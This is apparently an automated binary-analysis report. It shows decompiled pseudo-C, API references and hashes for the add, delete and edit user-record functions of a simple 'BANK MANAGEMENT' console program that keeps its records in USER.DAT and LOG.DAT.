                                                                      • Associated: 00000000.00000002.225752755.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: _wprintf$__wstrtime_fprintf_swscanf_wscanf$ConsoleCursorHandlePosition__fsopen__ftbuf__output_s_l__stbuf_vfscanf_vwscanf
                                                                      • String ID: %s %s %s$%s %s %s$%s %s %s$%s %s %s$Are you sure you want to CHANGE user name and/or password? <Y/N> : $Confirm NEW Password : $NEW Password : $NEW User Name : $Password : $Record has been EDITED successfully!$USER.DAT$USER.DAT$User Name : $temp.dat
                                                                      • API String ID: 1431756120-371646773
                                                                      • Opcode ID: 6710856b9ced7fb1653fca1d469c9d70089d410f2b9782101af5b90051272bdb
                                                                      • Instruction ID: 4c9e346449eaf39f9942d2fcf5562a4f9f16a30175766a4650e8ccb298ad6658
                                                                      • Opcode Fuzzy Hash: 6710856b9ced7fb1653fca1d469c9d70089d410f2b9782101af5b90051272bdb
                                                                      • Instruction Fuzzy Hash: A5818FB1D40389AAEB14EBA5DC43BAD77F4AF15740F0080B9F605B62D1EBB05608CB66
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 75%
                                                                      			E00BE2800(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __fp0) {
                                                                      				char _v5;
                                                                      				intOrPtr _v12;
                                                                      				char _v20;
                                                                      				char _v23;
                                                                      				char _v27;
                                                                      				char _v31;
                                                                      				char _v35;
                                                                      				char _v39;
                                                                      				char _v43;
                                                                      				char _v47;
                                                                      				char _v51;
                                                                      				char _v52;
                                                                      				char _v84;
                                                                      				char _v116;
                                                                      				char _v129;
                                                                      				char _v139;
                                                                      				char _v154;
                                                                      				char _v188;
                                                                      				void* __ebp;
                                                                      				intOrPtr _t47;
                                                                      				void* _t49;
                                                                      				char _t54;
                                                                      				intOrPtr _t56;
                                                                      				void* _t58;
                                                                      				intOrPtr _t62;
                                                                      				void* _t65;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr _t75;
                                                                      				intOrPtr _t79;
                                                                      				intOrPtr _t80;
                                                                      				intOrPtr _t83;
                                                                      				void* _t86;
                                                                      				void* _t88;
                                                                      				intOrPtr _t92;
                                                                      				intOrPtr _t93;
                                                                      				intOrPtr _t94;
                                                                      				intOrPtr _t96;
                                                                      				intOrPtr _t99;
                                                                      				intOrPtr _t105;
                                                                      				intOrPtr _t107;
                                                                      				intOrPtr _t109;
                                                                      				void* _t118;
                                                                      				void* _t122;
                                                                      				void* _t123;
                                                                      				void* _t124;
                                                                      				void* _t125;
                                                                      				void* _t127;
                                                                      				void* _t128;
                                                                      				void* _t132;
                                                                      				void* _t133;
                                                                      				void* _t139;
                                                                      
                                                                      				_t146 = __fp0;
                                                                      				_t117 = __esi;
                                                                      				_t116 = __edi;
                                                                      				_t89 = __ebx;
                                                                      				_v52 = 0;
                                                                      				_v51 = 0;
                                                                      				_v47 = 0;
                                                                      				_v43 = 0;
                                                                      				_v39 = 0;
                                                                      				_v35 = 0;
                                                                      				_v31 = 0;
                                                                      				_v27 = 0;
                                                                      				_v23 = 0;
                                                                      				_v12 = 0;
                                                                      				E00BE20E0(__ecx, __edi, __esi, 0, __fp0);
                                                                      				E00BE12B0(0x19, 8);
                                                                      				_push("User Name  : ");
                                                                      				E00BE715C(__ebx, __edi, __esi, 0);
                                                                      				E00BE738B("%s", 0xc02ee4);
                                                                      				E00BE12B0(0x19, 0xa);
                                                                      				_push("Password  : ");
                                                                      				E00BE715C(__ebx, __edi, __esi, 0);
                                                                      				E00BE12F0(_t116, _t117,  &_v52);
                                                                      				_t47 = E00BE6EF1("USER.DAT", "r");
                                                                      				_t122 = _t118 + 0x18;
                                                                      				 *0xc02f28 = _t47;
                                                                      				while(1) {
                                                                      					_push( &_v116);
                                                                      					_push( &_v84);
                                                                      					_t92 =  *0xc02f28; // 0x0
                                                                      					_t49 = E00BE7021(_t92, "%s %s %s\n", 0xc02ee0);
                                                                      					_t123 = _t122 + 0x14;
                                                                      					if(_t49 == 0xffffffff) {
                                                                      						break;
                                                                      					}
                                                                      					_t86 = E00BE8230(0xc02ee4,  &_v84);
                                                                      					_t122 = _t123 + 8;
                                                                      					if(_t86 == 0) {
                                                                      						_t88 = E00BE8230(0xc02f02,  &_v116);
                                                                      						_t122 = _t122 + 8;
                                                                      						if(_t88 == 0) {
                                                                      							_v12 = _v12 + 1;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				_t105 =  *0xc02f28; // 0x0
                                                                      				_push(_t105);
                                                                      				E00BE6DB6(_t89, _t116, _t117, __eflags);
                                                                      				_t124 = _t123 + 4;
                                                                      				E00BE20E0(_t92, _t116, _t117, __eflags, _t146);
                                                                      				__eflags = _v12;
                                                                      				if(__eflags != 0) {
                                                                      					E00BE12B0(0xf, 0xa);
                                                                      					_push("Are you sure you want to DELETE this user? <Y/N> : ");
                                                                      					E00BE715C(_t89, _t116, _t117, __eflags);
                                                                      					_t125 = _t124 + 4;
                                                                      					_t54 = _v5;
                                                                      					__eflags = _t54 - 0x59;
                                                                      					if(_t54 == 0x59) {
                                                                      						L10:
                                                                      						 *0xc02f28 = E00BE6EF1("USER.DAT", "r");
                                                                      						_t56 = E00BE6EF1("temp.dat", "a");
                                                                      						_t127 = _t125 + 0x10;
                                                                      						 *0xc02f20 = _t56;
                                                                      						while(1) {
                                                                      							_push( &_v116);
                                                                      							_push( &_v84);
                                                                      							_t93 =  *0xc02f28; // 0x0
                                                                      							_t58 = E00BE7021(_t93, "%s %s %s\n", 0xc02ee0);
                                                                      							_t128 = _t127 + 0x14;
                                                                      							__eflags = _t58 - 0xffffffff;
                                                                      							if(__eflags == 0) {
                                                                      								break;
                                                                      							}
                                                                      							_t79 = E00BE8230(0xc02ee4,  &_v84);
                                                                      							_t139 = _t128 + 8;
                                                                      							__eflags = _t79;
                                                                      							if(__eflags != 0) {
                                                                      								L14:
                                                                      								_push( &_v116);
                                                                      								_push( &_v84);
                                                                      								_push(0xc02ee0);
                                                                      								_push("%s %s %s\n");
                                                                      								_t80 =  *0xc02f20; // 0x0
                                                                      								_push(_t80);
                                                                      								E00BE6F06(_t89, _t116, _t117, __eflags);
                                                                      								_t127 = _t139 + 0x14;
                                                                      								L15:
                                                                      								continue;
                                                                      							}
                                                                      							_t83 = E00BE8230(0xc02f02,  &_v116);
                                                                      							_t127 = _t139 + 8;
                                                                      							__eflags = _t83;
                                                                      							if(__eflags == 0) {
                                                                      								goto L15;
                                                                      							}
                                                                      							goto L14;
                                                                      						}
                                                                      						_t94 =  *0xc02f28; // 0x0
                                                                      						_push(_t94);
                                                                      						E00BE6DB6(_t89, _t116, _t117, __eflags);
                                                                      						_t107 =  *0xc02f20; // 0x0
                                                                      						_push(_t107);
                                                                      						E00BE6DB6(_t89, _t116, _t117, __eflags);
                                                                      						 *0xc02f28 = E00BE6EF1("LOG.DAT", "r");
                                                                      						_t62 = E00BE6EF1("temp.dat", "w");
                                                                      						_t132 = _t128 + 0x18;
                                                                      						 *0xc02f20 = _t62;
                                                                      						while(1) {
                                                                      							_push( &_v129);
                                                                      							_push( &_v139);
                                                                      							_push( &_v154);
                                                                      							_t96 =  *0xc02f28; // 0x0
                                                                      							_t65 = E00BE7021(_t96, "%s %s %s %s",  &_v188);
                                                                      							_t133 = _t132 + 0x18;
                                                                      							__eflags = _t65 - 0xffffffff;
                                                                      							if(__eflags == 0) {
                                                                      								break;
                                                                      							}
                                                                      							E00BF7CF2( &_v188);
                                                                      							E00BF7CF2( &_v20);
                                                                      							_t75 = E00BE8230( &_v188,  &_v20);
                                                                      							_t132 = _t133 + 0x10;
                                                                      							__eflags = _t75;
                                                                      							if(__eflags != 0) {
                                                                      								_push( &_v129);
                                                                      								_push( &_v139);
                                                                      								_push( &_v154);
                                                                      								_push( &_v188);
                                                                      								_push("%s %s %s %s\n");
                                                                      								_t99 =  *0xc02f20; // 0x0
                                                                      								_push(_t99);
                                                                      								E00BE6F06(_t89, _t116, _t117, __eflags);
                                                                      								_t132 = _t132 + 0x18;
                                                                      							}
                                                                      						}
                                                                      						_t109 =  *0xc02f28; // 0x0
                                                                      						_push(_t109);
                                                                      						E00BE6DB6(_t89, _t116, _t117, __eflags);
                                                                      						_t67 =  *0xc02f20; // 0x0
                                                                      						_push(_t67);
                                                                      						E00BE6DB6(_t89, _t116, _t117, __eflags);
                                                                      						E00BE20E0(_t96, _t116, _t117, __eflags, _t146);
                                                                      						E00BE12B0(0x19, 0xa);
                                                                      						_push("Record DELETED successfully!");
                                                                      						return E00BE715C(_t89, _t116, _t117, __eflags);
                                                                      					}
                                                                      					__eflags = _v5 - 0x79;
                                                                      					if(_v5 != 0x79) {
                                                                      						return _t54;
                                                                      					}
                                                                      					goto L10;
                                                                      				}
                                                                      				E00BE12B0(0xa, 0xa);
                                                                      				_push(0xbff4fc);
                                                                      				return E00BE715C(_t89, _t116, _t117, __eflags);
                                                                      			}






















































                                                                      0x00be2800
                                                                      0x00be2800
                                                                      0x00be2800
                                                                      0x00be2800
                                                                      0x00be2809
                                                                      0x00be280f
                                                                      0x00be2812
                                                                      0x00be2815
                                                                      0x00be2818
                                                                      0x00be281b
                                                                      0x00be281e
                                                                      0x00be2821
                                                                      0x00be2824
                                                                      0x00be2827
                                                                      0x00be282e
                                                                      0x00be2837
                                                                      0x00be283c
                                                                      0x00be2841
                                                                      0x00be2853
                                                                      0x00be285f
                                                                      0x00be2864
                                                                      0x00be2869
                                                                      0x00be2875
                                                                      0x00be2884
                                                                      0x00be2889
                                                                      0x00be288c
                                                                      0x00be2891
                                                                      0x00be2894
                                                                      0x00be2898
                                                                      0x00be28a3
                                                                      0x00be28aa
                                                                      0x00be28af
                                                                      0x00be28b5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be28c0
                                                                      0x00be28c5
                                                                      0x00be28ca
                                                                      0x00be28d5
                                                                      0x00be28da
                                                                      0x00be28df
                                                                      0x00be28e7
                                                                      0x00be28e7
                                                                      0x00be28df
                                                                      0x00be28ea
                                                                      0x00be28ec
                                                                      0x00be28f2
                                                                      0x00be28f3
                                                                      0x00be28f8
                                                                      0x00be28fb
                                                                      0x00be2900
                                                                      0x00be2904
                                                                      0x00be2925
                                                                      0x00be292a
                                                                      0x00be292f
                                                                      0x00be2934
                                                                      0x00be2937
                                                                      0x00be293b
                                                                      0x00be293e
                                                                      0x00be294d
                                                                      0x00be295f
                                                                      0x00be296e
                                                                      0x00be2973
                                                                      0x00be2976
                                                                      0x00be297b
                                                                      0x00be297e
                                                                      0x00be2982
                                                                      0x00be298d
                                                                      0x00be2994
                                                                      0x00be2999
                                                                      0x00be299c
                                                                      0x00be299f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be29aa
                                                                      0x00be29af
                                                                      0x00be29b2
                                                                      0x00be29b4
                                                                      0x00be29cb
                                                                      0x00be29ce
                                                                      0x00be29d2
                                                                      0x00be29d3
                                                                      0x00be29d8
                                                                      0x00be29dd
                                                                      0x00be29e2
                                                                      0x00be29e3
                                                                      0x00be29e8
                                                                      0x00be29eb
                                                                      0x00000000
                                                                      0x00be29eb
                                                                      0x00be29bf
                                                                      0x00be29c4
                                                                      0x00be29c7
                                                                      0x00be29c9
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be29c9
                                                                      0x00be29ed
                                                                      0x00be29f3
                                                                      0x00be29f4
                                                                      0x00be29fc
                                                                      0x00be2a02
                                                                      0x00be2a03
                                                                      0x00be2a1d
                                                                      0x00be2a2c
                                                                      0x00be2a31
                                                                      0x00be2a34
                                                                      0x00be2a39
                                                                      0x00be2a3c
                                                                      0x00be2a43
                                                                      0x00be2a4a
                                                                      0x00be2a57
                                                                      0x00be2a5e
                                                                      0x00be2a63
                                                                      0x00be2a66
                                                                      0x00be2a69
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be2a72
                                                                      0x00be2a7e
                                                                      0x00be2a91
                                                                      0x00be2a96
                                                                      0x00be2a99
                                                                      0x00be2a9b
                                                                      0x00be2aa0
                                                                      0x00be2aa7
                                                                      0x00be2aae
                                                                      0x00be2ab5
                                                                      0x00be2ab6
                                                                      0x00be2abb
                                                                      0x00be2ac1
                                                                      0x00be2ac2
                                                                      0x00be2ac7
                                                                      0x00be2ac7
                                                                      0x00be2aca
                                                                      0x00be2acf
                                                                      0x00be2ad5
                                                                      0x00be2ad6
                                                                      0x00be2ade
                                                                      0x00be2ae3
                                                                      0x00be2ae4
                                                                      0x00be2aec
                                                                      0x00be2af5
                                                                      0x00be2afa
                                                                      0x00000000
                                                                      0x00be2b04
                                                                      0x00be2944
                                                                      0x00be2947
                                                                      0x00be2b0a
                                                                      0x00be2b0a
                                                                      0x00000000
                                                                      0x00be2947
                                                                      0x00be290a
                                                                      0x00be290f
                                                                      0x00000000

                                                                      APIs
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE20FF
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE213E
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE215F
                                                                        • Part of subcall function 00BE20E0: __wstrtime.LIBCMT ref: 00BE216C
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE2188
                                                                        • Part of subcall function 00BE20E0: __wstrtime.LIBCMT ref: 00BE2195
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE21C8
                                                                        • Part of subcall function 00BE12B0: GetStdHandle.KERNEL32(000000F5,00000000,?,00BE1393,?,?,?,00BE1233), ref: 00BE12D1
                                                                        • Part of subcall function 00BE12B0: SetConsoleCursorPosition.KERNEL32(00000000,?,00BE1393,?,?,?,00BE1233), ref: 00BE12D8
                                                                      • _wprintf.LIBCMT ref: 00BE2841
                                                                      • _wscanf.LIBCMT ref: 00BE2853
                                                                        • Part of subcall function 00BE738B: _vwscanf.LIBCMT ref: 00BE739C
                                                                      • _wprintf.LIBCMT ref: 00BE2869
                                                                        • Part of subcall function 00BE715C: __stbuf.LIBCMT ref: 00BE71A8
                                                                        • Part of subcall function 00BE715C: __output_s_l.LIBCMT ref: 00BE71C2
                                                                        • Part of subcall function 00BE715C: __ftbuf.LIBCMT ref: 00BE71D6
                                                                        • Part of subcall function 00BE12F0: _wprintf.LIBCMT ref: 00BE1329
                                                                        • Part of subcall function 00BE6EF1: __fsopen.LIBCMT ref: 00BE6EFC
                                                                      • _swscanf.LIBCMT ref: 00BE28AA
                                                                        • Part of subcall function 00BE7021: _vfscanf.LIBCMT ref: 00BE7035
                                                                      • _wprintf.LIBCMT ref: 00BE2914
                                                                      • _wprintf.LIBCMT ref: 00BE292F
                                                                      • _swscanf.LIBCMT ref: 00BE2994
                                                                      • _fprintf.LIBCMT ref: 00BE29E3
                                                                      • _swscanf.LIBCMT ref: 00BE2A5E
                                                                      • _fprintf.LIBCMT ref: 00BE2AC2
                                                                      • _wprintf.LIBCMT ref: 00BE2AFF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.225676586.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000000.00000002.225663040.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225715561.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225731360.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225744873.0000000000C01000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225752755.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: _wprintf$_swscanf$__wstrtime_fprintf$ConsoleCursorHandlePosition__fsopen__ftbuf__output_s_l__stbuf_vfscanf_vwscanf_wscanf
                                                                      • String ID: %s %s %s$%s %s %s$%s %s %s$%s %s %s %s$%s %s %s %s$Are you sure you want to DELETE this user? <Y/N> : $LOG.DAT$Password : $Record DELETED successfully!$USER.DAT$USER.DAT$User Name : $temp.dat$temp.dat
                                                                      • API String ID: 3163849712-4002591224
                                                                      • Opcode ID: 3e267e05dab8b1be00bde71925b3e570eb644698295203f2de891da79f9f024e
                                                                      • Instruction ID: dd7a13ec91f709b5e9ceaa33ab2ac6cee02ec04cb4340658f614a3c06943cf36
                                                                      • Opcode Fuzzy Hash: 3e267e05dab8b1be00bde71925b3e570eb644698295203f2de891da79f9f024e
                                                                      • Instruction Fuzzy Hash: 4A71A8B2D402596ADB10EBE59C43FBE73F8AB25740F0441B9F605A62D2FB71960CC762
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 80%
                                                                      			E00BE25C0(void* __ebx, void* __edi, void* __esi, void* __fp0) {
                                                                      				char _v8;
                                                                      				char _v12;
                                                                      				char _v15;
                                                                      				char _v19;
                                                                      				char _v23;
                                                                      				char _v27;
                                                                      				char _v31;
                                                                      				char _v35;
                                                                      				char _v39;
                                                                      				char _v43;
                                                                      				char _v44;
                                                                      				char _v47;
                                                                      				char _v51;
                                                                      				char _v55;
                                                                      				char _v59;
                                                                      				char _v63;
                                                                      				char _v67;
                                                                      				char _v71;
                                                                      				char _v75;
                                                                      				char _v76;
                                                                      				char _v108;
                                                                      				char _v140;
                                                                      				void* __ebp;
                                                                      				intOrPtr _t42;
                                                                      				void* _t44;
                                                                      				intOrPtr _t53;
                                                                      				intOrPtr _t58;
                                                                      				intOrPtr _t67;
                                                                      				void* _t70;
                                                                      				void* _t73;
                                                                      				intOrPtr _t75;
                                                                      				intOrPtr _t76;
                                                                      				intOrPtr _t79;
                                                                      				void* _t83;
                                                                      				void* _t84;
                                                                      				void* _t85;
                                                                      				void* _t88;
                                                                      				void* _t89;
                                                                      				void* _t90;
                                                                      				void* _t103;
                                                                      
                                                                      				_t103 = __fp0;
                                                                      				_t84 = __esi;
                                                                      				_t83 = __edi;
                                                                      				_t73 = __ebx;
                                                                      				_v8 = 0;
                                                                      				_v12 = 0;
                                                                      				_v76 = 0;
                                                                      				_v75 = 0;
                                                                      				_v71 = 0;
                                                                      				_v67 = 0;
                                                                      				_v63 = 0;
                                                                      				_v59 = 0;
                                                                      				_v55 = 0;
                                                                      				_v51 = 0;
                                                                      				_v47 = 0;
                                                                      				_v44 = 0;
                                                                      				_t74 = 0;
                                                                      				_v43 = 0;
                                                                      				_v39 = 0;
                                                                      				_v35 = 0;
                                                                      				_v31 = 0;
                                                                      				_v27 = 0;
                                                                      				_v23 = 0;
                                                                      				_v19 = 0;
                                                                      				_v15 = 0;
                                                                      				do {
                                                                      					E00BE20E0(_t74, _t83, _t84, 0, _t103);
                                                                      					_v8 = 0;
                                                                      					E00BE12B0(0x19, 8);
                                                                      					_push("User Name        : ");
                                                                      					E00BE715C(_t73, _t83, _t84, 0);
                                                                      					E00BE738B("%s", 0xc02ee4);
                                                                      					_t42 = E00BE6EF1("USER.DAT", "r");
                                                                      					_t88 = _t85 + 0x14;
                                                                      					 *0xc02f28 = _t42;
                                                                      					_v12 = 0;
                                                                      					while(1) {
                                                                      						_push( &_v140);
                                                                      						_push( &_v108);
                                                                      						_t75 =  *0xc02f28; // 0x0
                                                                      						_t44 = E00BE7021(_t75, "%s %s %s\n", 0xc02ee0);
                                                                      						_t89 = _t88 + 0x14;
                                                                      						if(_t44 == 0xffffffff) {
                                                                      							goto L6;
                                                                      						}
                                                                      						_t70 = E00BE8230( &_v108, 0xc02ee4);
                                                                      						_t88 = _t89 + 8;
                                                                      						if(_t70 == 0) {
                                                                      							_v12 = _v12 + 1;
                                                                      						}
                                                                      					}
                                                                      					L6:
                                                                      					_t74 =  *0xc02f28; // 0x0
                                                                      					_push(_t74);
                                                                      					E00BE6DB6(_t73, _t83, _t84, __eflags);
                                                                      					_t90 = _t89 + 4;
                                                                      					__eflags = _v12;
                                                                      					if(__eflags == 0) {
                                                                      						E00BE12B0(0x19, 0xa);
                                                                      						_push("Password         : ");
                                                                      						E00BE715C(_t73, _t83, _t84, __eflags);
                                                                      						E00BE12F0(_t83, _t84,  &_v76);
                                                                      						E00BE12B0(0x19, 0xc);
                                                                      						_push("Confirm Password : ");
                                                                      						E00BE715C(_t73, _t83, _t84, __eflags);
                                                                      						_t74 =  &_v44;
                                                                      						E00BE12F0(_t83, _t84,  &_v44);
                                                                      						_t53 = E00BE8230(0xc02f02,  &_v44);
                                                                      						_t85 = _t90 + 0x10;
                                                                      						__eflags = _t53;
                                                                      						if(__eflags != 0) {
                                                                      							E00BE20E0( &_v44, _t83, _t84, __eflags, _t103);
                                                                      							E00BE12B0(0xa, 0xa);
                                                                      							_push(0xbff444);
                                                                      							E00BE715C(_t73, _t83, _t84, __eflags);
                                                                      							_t85 = _t85 + 4;
                                                                      							_t67 = _v8 + 1;
                                                                      							__eflags = _t67;
                                                                      							_v8 = _t67;
                                                                      						}
                                                                      					} else {
                                                                      						E00BE12B0(0xa, 0xa);
                                                                      						_push(0xbff3e0);
                                                                      						E00BE715C(_t73, _t83, _t84, __eflags);
                                                                      						_t85 = _t90 + 4;
                                                                      						_v8 = _v8 + 1;
                                                                      					}
                                                                      					__eflags = _v8;
                                                                      				} while (__eflags != 0);
                                                                      				 *0xc02f28 = E00BE6EF1("USER.DAT", 0xbff474);
                                                                      				_t76 =  *0xc02f28; // 0x0
                                                                      				_push(_t76);
                                                                      				E00BE6DB6(_t73, _t83, _t84, __eflags);
                                                                      				 *0xc02f28 = E00BE6EF1("USER.DAT", "a");
                                                                      				_push(0xc02f02);
                                                                      				_push(0xc02ee4);
                                                                      				_push(0xc02ee0);
                                                                      				_push("%s %s %s\n");
                                                                      				_t79 =  *0xc02f28; // 0x0
                                                                      				_push(_t79);
                                                                      				E00BE6F06(_t73, _t83, _t84, __eflags);
                                                                      				_t58 =  *0xc02f28; // 0x0
                                                                      				_push(_t58);
                                                                      				E00BE6DB6(_t73, _t83, _t84, __eflags);
                                                                      				E00BE20E0(_t76, _t83, _t84, __eflags, _t103);
                                                                      				E00BE12B0(0x19, 0xa);
                                                                      				_push("Record ADDED successfully!");
                                                                      				return E00BE715C(_t73, _t83, _t84, __eflags);
                                                                      			}











































                                                                      0x00be25c0
                                                                      0x00be25c0
                                                                      0x00be25c0
                                                                      0x00be25c0
                                                                      0x00be25c9
                                                                      0x00be25d0
                                                                      0x00be25d7
                                                                      0x00be25dd
                                                                      0x00be25e0
                                                                      0x00be25e3
                                                                      0x00be25e6
                                                                      0x00be25e9
                                                                      0x00be25ec
                                                                      0x00be25ef
                                                                      0x00be25f2
                                                                      0x00be25f5
                                                                      0x00be25f9
                                                                      0x00be25fb
                                                                      0x00be25fe
                                                                      0x00be2601
                                                                      0x00be2604
                                                                      0x00be2607
                                                                      0x00be260a
                                                                      0x00be260d
                                                                      0x00be2610
                                                                      0x00be2613
                                                                      0x00be2613
                                                                      0x00be2618
                                                                      0x00be2623
                                                                      0x00be2628
                                                                      0x00be262d
                                                                      0x00be263f
                                                                      0x00be2651
                                                                      0x00be2656
                                                                      0x00be2659
                                                                      0x00be265e
                                                                      0x00be2665
                                                                      0x00be266b
                                                                      0x00be266f
                                                                      0x00be267a
                                                                      0x00be2681
                                                                      0x00be2686
                                                                      0x00be268c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be2697
                                                                      0x00be269c
                                                                      0x00be26a1
                                                                      0x00be26a9
                                                                      0x00be26a9
                                                                      0x00be26ac
                                                                      0x00be26ae
                                                                      0x00be26ae
                                                                      0x00be26b4
                                                                      0x00be26b5
                                                                      0x00be26ba
                                                                      0x00be26bd
                                                                      0x00be26c1
                                                                      0x00be26e8
                                                                      0x00be26ed
                                                                      0x00be26f2
                                                                      0x00be26fe
                                                                      0x00be2707
                                                                      0x00be270c
                                                                      0x00be2711
                                                                      0x00be2719
                                                                      0x00be271d
                                                                      0x00be272b
                                                                      0x00be2730
                                                                      0x00be2733
                                                                      0x00be2735
                                                                      0x00be2737
                                                                      0x00be2740
                                                                      0x00be2745
                                                                      0x00be274a
                                                                      0x00be274f
                                                                      0x00be2755
                                                                      0x00be2755
                                                                      0x00be2758
                                                                      0x00be2758
                                                                      0x00be26c3
                                                                      0x00be26c7
                                                                      0x00be26cc
                                                                      0x00be26d1
                                                                      0x00be26d6
                                                                      0x00be26df
                                                                      0x00be26df
                                                                      0x00be275b
                                                                      0x00be275b
                                                                      0x00be2777
                                                                      0x00be277c
                                                                      0x00be2782
                                                                      0x00be2783
                                                                      0x00be279d
                                                                      0x00be27a2
                                                                      0x00be27a7
                                                                      0x00be27ac
                                                                      0x00be27b1
                                                                      0x00be27b6
                                                                      0x00be27bc
                                                                      0x00be27bd
                                                                      0x00be27c5
                                                                      0x00be27ca
                                                                      0x00be27cb
                                                                      0x00be27d3
                                                                      0x00be27dc
                                                                      0x00be27e1
                                                                      0x00be27f1

                                                                      APIs
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE20FF
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE213E
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE215F
                                                                        • Part of subcall function 00BE20E0: __wstrtime.LIBCMT ref: 00BE216C
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE2188
                                                                        • Part of subcall function 00BE20E0: __wstrtime.LIBCMT ref: 00BE2195
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE21C8
                                                                        • Part of subcall function 00BE12B0: GetStdHandle.KERNEL32(000000F5,00000000,?,00BE1393,?,?,?,00BE1233), ref: 00BE12D1
                                                                        • Part of subcall function 00BE12B0: SetConsoleCursorPosition.KERNEL32(00000000,?,00BE1393,?,?,?,00BE1233), ref: 00BE12D8
                                                                      • _wprintf.LIBCMT ref: 00BE262D
                                                                      • _wscanf.LIBCMT ref: 00BE263F
                                                                        • Part of subcall function 00BE738B: _vwscanf.LIBCMT ref: 00BE739C
                                                                        • Part of subcall function 00BE6EF1: __fsopen.LIBCMT ref: 00BE6EFC
                                                                      • _swscanf.LIBCMT ref: 00BE2681
                                                                        • Part of subcall function 00BE7021: _vfscanf.LIBCMT ref: 00BE7035
                                                                      • _wprintf.LIBCMT ref: 00BE26D1
                                                                      • _wprintf.LIBCMT ref: 00BE26F2
                                                                      • _wprintf.LIBCMT ref: 00BE2711
                                                                      • _wprintf.LIBCMT ref: 00BE274A
                                                                      • _fprintf.LIBCMT ref: 00BE27BD
                                                                      • _wprintf.LIBCMT ref: 00BE27E6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.225676586.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000000.00000002.225663040.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225715561.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225731360.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225744873.0000000000C01000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000000.00000002.225752755.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: _wprintf$__wstrtime$ConsoleCursorHandlePosition__fsopen_fprintf_swscanf_vfscanf_vwscanf_wscanf
                                                                      • String ID: %s %s %s$%s %s %s$Confirm Password : $Password : $Record ADDED successfully!$USER.DAT$USER.DAT$USER.DAT$User Name :
                                                                      • API String ID: 3917209068-3252730458
                                                                      • Opcode ID: 3db220c6ab6506e561510b04be0d62cf3761a09038d99e832a46aebb03ebc071
                                                                      • Instruction ID: 340017823bc09db03cf8fa578e0473c88c5f3efa0779e94c28764daaae2dda68
                                                                      • Opcode Fuzzy Hash: 3db220c6ab6506e561510b04be0d62cf3761a09038d99e832a46aebb03ebc071
                                                                      • Instruction Fuzzy Hash: 43518EB1E80349ABDB10EBA5DC47BAD76F06F15744F1440B9F604B62C1EBB09648C76A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 73%
                                                                      			E00BE21E0(void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                      				intOrPtr _v8;
                                                                      				void* __ebp;
                                                                      				void* _t28;
                                                                      				intOrPtr _t31;
                                                                      				void* _t34;
                                                                      				void* _t35;
                                                                      				void* _t36;
                                                                      
                                                                      				_t33 = __esi;
                                                                      				_t32 = __edi;
                                                                      				E00BE1380(__edi, __esi, __eflags, 0, 0, 0x50, 0x17);
                                                                      				E00BE12B0(0x1b, 4);
                                                                      				_push("BANK MANAGEMENT //");
                                                                      				E00BE715C(_t28, __edi, __esi, __eflags);
                                                                      				_t35 = _t34 + 4;
                                                                      				E00BE12B0(0x19, 5);
                                                                      				_v8 = 0;
                                                                      				while(1) {
                                                                      					_t42 = _v8 - 0x1b;
                                                                      					if(_v8 >= 0x1b) {
                                                                      						break;
                                                                      					}
                                                                      					_push(0xc4);
                                                                      					_push("%c");
                                                                      					E00BE715C(_t28, _t32, _t33, _t42);
                                                                      					_t35 = _t35 + 8;
                                                                      					_v8 = _v8 + 1;
                                                                      				}
                                                                      				E00BE12B0(0x19, 8);
                                                                      				_push("Designed and Programmed by:");
                                                                      				E00BE715C(_t28, _t32, _t33, __eflags);
                                                                      				_t36 = _t35 + 4;
                                                                      				E00BE12B0(0x19, 9);
                                                                      				_v8 = 0;
                                                                      				while(1) {
                                                                      					__eflags = _v8 - 0x1b;
                                                                      					if(__eflags >= 0) {
                                                                      						break;
                                                                      					}
                                                                      					_push(0xc4);
                                                                      					_push("%c");
                                                                      					E00BE715C(_t28, _t32, _t33, __eflags);
                                                                      					_t36 = _t36 + 8;
